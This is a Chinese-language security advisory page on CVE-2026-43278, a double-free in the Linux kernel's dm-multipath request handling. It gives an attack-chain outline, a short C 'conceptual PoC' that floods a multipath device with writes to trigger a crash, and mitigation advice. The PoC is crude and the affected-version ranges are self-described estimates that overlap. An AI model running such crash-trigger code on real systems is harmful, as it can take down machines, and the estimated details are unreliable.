CVE-2026-43278 CVSS 7.8 高危

CVE-2026-43278 Linux内核DM双重释放漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43278

漏洞类型

释放后重用 (UAF) / 双重释放

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核设备映射器（DM）存在高危漏洞。在基于请求的DM目标（如dm-multipath）中，克隆请求bio完成后未清除`rq->bio`指针，导致后续拆解时重复释放内存。这引发释放后重用（UAF）和双重释放，可能导致系统崩溃或本地权限提升。

技术细节

漏洞源于Linux内核块层处理克隆请求时的逻辑缺陷。当使用dm-multipath时，`blk_complete_request()`调用`bio_endio()`释放了克隆bio，但`rq->bio`未置空。随后`rq->end_io()`回调触发，调用`blk_rq_unprep_clone()`尝试再次释放同一块内存。这种双重释放破坏了内核堆结构。攻击者需本地低权限（PR:L）触发特定I/O路径，利用该内存破坏漏洞可能导致内核崩溃或执行任意代码。

攻击链分析

STEP 1

步骤1

攻击者获取系统本地低权限用户访问。

STEP 2

步骤2

确认目标系统使用了dm-multipath且底层为NVMe设备。

STEP 3

步骤3

执行特定的I/O操作序列，触发克隆请求的完成与拆解逻辑。

STEP 4

步骤4

内核执行`blk_rq_unprep_clone`导致双重释放。

STEP 5

步骤5

触发内核崩溃或利用内存破坏提升权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43278
 * Triggering the double-free in dm-multipath requires specific I/O patterns.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

void trigger_crash() {
    // Open a device managed by dm-multipath (e.g., /dev/mapper/mpatha)
    // This requires the system to be configured with dm-multipath.
    int fd = open("/dev/mapper/mpatha", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return;
    }

    printf("[*] Sending I/O requests to trigger UAF condition...\n");
    char *buffer = malloc(4096);
    // Continuous write operations to stress the clone request completion path
    for (int i = 0; i < 10000; i++) {
        write(fd, buffer, 4096);
    }

    free(buffer);
    close(fd);
    // If vulnerable, the kernel may hit a double-free or general protection fault
}

int main() {
    trigger_crash();
    return 0;
}

影响范围

Linux Kernel < 6.6 (预估)

Linux Kernel < 6.1 (预估)

Linux Kernel < 5.15 (预估)

防御指南

临时缓解措施

由于漏洞需要本地访问，主要缓解措施是严格限制用户权限。此外，如果可能，避免在关键系统上使用受影响的dm-multipath配置，直到内核更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表